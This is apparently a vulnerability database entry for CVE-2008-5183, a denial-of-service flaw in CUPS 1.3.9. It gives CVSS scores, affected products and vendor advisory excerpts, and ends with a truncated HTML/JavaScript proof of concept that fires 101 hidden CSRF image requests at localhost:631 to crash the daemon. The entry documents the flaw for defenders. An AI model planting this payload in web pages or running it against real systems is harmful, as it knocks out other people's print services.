CVE-2008-5183

Published: 21/11/2008 Updated: 28/12/2023
CVSS v2 Base Score: 4.3 | Impact Score: 2.9 | Exploitability Score: 8.6
CVSS v3 Base Score: 7.5 | Impact Score: 3.6 | Exploitability Score: 3.9
VMScore: 435
Vector: AV:N/AC:M/Au:N/C:N/I:N/A:P

Vulnerability Summary

cupsd in CUPS 1.3.9 and previous versions allows local users, and possibly remote attackers, to cause a denial of service (daemon crash) by adding a large number of RSS Subscriptions, which triggers a NULL pointer dereference. NOTE: this issue can be triggered remotely by leveraging CVE-2008-5184.

Vulnerable Product

apple cups

apple mac os x

apple mac os x server

opensuse opensuse 11.0

debian debian linux 5.0

debian debian linux 6.0

Vendor Advisories

Synopsis: Moderate: cups security update. Type/Severity: Security Advisory: Moderate. Topic: Updated cups packages that fix a security issue are now available for Red Hat Enterprise Linux 5. This update has been rated as having moderate security impact by the Red Hat Security Response Team. Description ...
Debian Bug report logs - #506180 CVE-2008-5183: daemon crashes when adding more than 100 subscriptions. Package: cups; Maintainer for cups is Debian Printing Team <debian-printing@lists.debian.org>; Source for cups is src:cups (PTS, buildd, popcon). Reported by: Raphael Geissert <atomo64@gmail.com>. Date: Wed, 19 Nov 20 ...
It was discovered that CUPS didn't properly handle adding a large number of RSS subscriptions. A local user could exploit this and cause CUPS to crash, leading to a denial of service. This issue only applied to Ubuntu 7.10, 8.04 LTS and 8.10. (CVE-2008-5183) ...
Several vulnerabilities have been discovered in the Common UNIX Printing System: CVE-2008-5183: A null pointer dereference in RSS job completion notifications could lead to denial of service. CVE-2009-3553: It was discovered that incorrect file descriptor handling could lead to denial of service. CVE-2010-0540: A cross-site request for ...

Exploits

<!-- cat cups_dos_poc.html -->
<script>
// make 101 CSRFed requests to CUPS daemon via 'img' tags
// causes CUPS daemon to crash
// by Adrian 'pagvac' Pastor | GNUCITIZEN.org
for(var i=1;i<=101;++i) {
  document.write("<img width=0 height=0 " +
    "src=\"localhost:631/admin/?OP=add-rss-subscription&SUBSCRIPTION ...